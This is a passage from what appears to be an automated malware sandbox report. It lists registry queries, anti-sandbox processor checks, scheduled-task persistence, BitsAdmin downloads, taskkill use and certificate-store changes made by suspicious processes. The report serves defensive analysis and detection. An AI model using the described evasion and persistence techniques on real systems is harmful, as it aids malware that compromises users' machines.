value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dcfbdig Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI trfbdig Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI yoX1lbJjB0CYEqqcW6Y2Yb_p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dcfbdig Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6PzDKqTumYc6wQmCZmE1EFMz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI trfbdig Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI trfbdig Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
FastPC.exe10DF.exeCD5.exebuild2.exesvchost.exevpn.tmpdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FastPC.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 10DF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString CD5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 FastPC.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CD5.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 10DF.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 vpn.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vpn.tmp -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 10940 schtasks.exe 4008 schtasks.exe 2832 schtasks.exe 4032 schtasks.exe 6116 schtasks.exe 5800 schtasks.exe 640 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 3736 timeout.exe 9240 timeout.exe 5484 timeout.exe 2228 timeout.exe 9416 timeout.exe -
Download via BitsAdmin 1 TTPs 3 IoCs
Processes:
bitsadmin.exebitsadmin.exebitsadmin.exepid process 8680 bitsadmin.exe 10172 bitsadmin.exe 1108 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
SearchUI.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4064 taskkill.exe 6456 taskkill.exe 3312 taskkill.exe 6356 taskkill.exe 8916 taskkill.exe 10508 taskkill.exe 10184 taskkill.exe 2144 taskkill.exe 3888 taskkill.exe 8812 taskkill.exe 8856 taskkill.exe 5880 taskkill.exe 5900 taskkill.exe 10688 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exebrowser_broker.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mask_svc.exeDrvInst.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-352 = "FLE Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates mask_svc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\A053375BFE84E8B748782C7CEE15827A6AF5A405\Blob = 030000000100000014000000a053375bfe84e8b748782c7cee15827a6af5a405190000000100000010000000f044424c506513d62804c04f719403f9040000000100000010000000e829e65d7c4307d6fbc13c179e037a360f0000000100000020000000444ebd67bb83f8807b3921e938ac9178b882bd50aadb11231f044cf5f08df7ce140000000100000014000000142eb317b75856cbae500940e61faf9d8b14c2c65c0000000100000004000000000800001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000001a05000030820516308202fea003020102021100912b084acf0c18a753f6d62e25a75f5a300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3230303930343030303030305a170d3235303931353136303030305a3032310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074310b300906035504031302523330820122300d06092a864886f70d01010105000382010f003082010a0282010100bb021528ccf6a094d30f12ec8d5592c3f882f199a67a4288a75d26aab52bb9c54cb1af8e6bf975c8a3d70f4794145535578c9ea8a23919f5823c42a94e6ef53bc32edb8dc0b05cf35938e7edcf69f05a0b1bbec094242587fa3771b313e71cace19befdbe43b45524596a9c153ce34c852eeb5aeed8fde6070e2a554abb66d0e97a540346b2bd3bc66eb66347cfa6b8b8f572999f830175dba726ffb81c5add286583d17c7e709bbf12bf786dcc1da715dd446e3ccad25c188bc60677566b3f118f7a25ce653ff3a88b647a5ff1318ea9809773f9d53f9cf01e5f5a6701714af63a4ff99b3939ddc53a706fe48851da169ae2575bb13cc5203f5ed51a18bdb150203010001a382010830820104300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030206082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414142eb317b75856cbae500940e61faf9d8b14c2c6301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f30220603551d20041b30193008060667810c010201300d060b2b0601040182df13010101300d06092a864886f70d01010b0500038202010085ca4e473ea3f7854485bcd56778b29863ad754d1e963d336572542d81a0eac3edf820bf5fccb77000b76e3bf65e94dee4209fa6ef8bb203e7a2b5163c91ceb4ed3902e77c258a47e6656e3f46f4d9f0ce942bee54ce12bc8c274bb8c1982fa2afcd71914a08b7c8b8237b042d08f908573e83d904330a472178098227c32ac89bb9ce5cf264c8c0be79c04f8e6d440c5e92bb2ef78b10e1e81d4429db5920ed63b921f81226949357a01d6504c10a22ae100d4397a1181f7ee0e08637b55ab1bd30bf876e2b2aff214e1b05c3f51897f05eacc3a5b86af02ebc3b33b9ee4bdeccfce4af840b863fc0554336f668e136176a8e99d1ffa540a734b7c0d063393539756ef2ba76c89302e9a94b6c17ce0c02d9bd81fb9fb768d40665b3823d7753f88e7903ad0a3107752a43d8559772c4290ef7c45d4ec8ae468430d7f2855f18a179bbe75e708b07e18693c3b98fdc6171252aafdfed255052688b92dce5d6b5e3da7dd0876c842131ae82f5fbb9abc889173de14ce5380ef6bd2bbd968114ebd5db3d20a77e59d3e2f858f95bb848cdfe5c4f1629fe1e5523afc811b08dea7c9390172ffdaca20947463ff0e9b0b7ff284d6832d6675e1e69a393b8f59d8b2f0bd25243a66f3257654d3281df3853855d7e5d6629eab8dde495b5cdb5561242cdc44ec6253844506decce005518fee94964d44eca979cb45bc073a8abb847c2 mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates mask_svc.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2321 = "Sakhalin Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" mask_svc.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeha.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeexplorer.exeSearchUI.exeMicrosoftEdgeCP.exeMicrosoftEdge.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = eda47e9320aed701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) 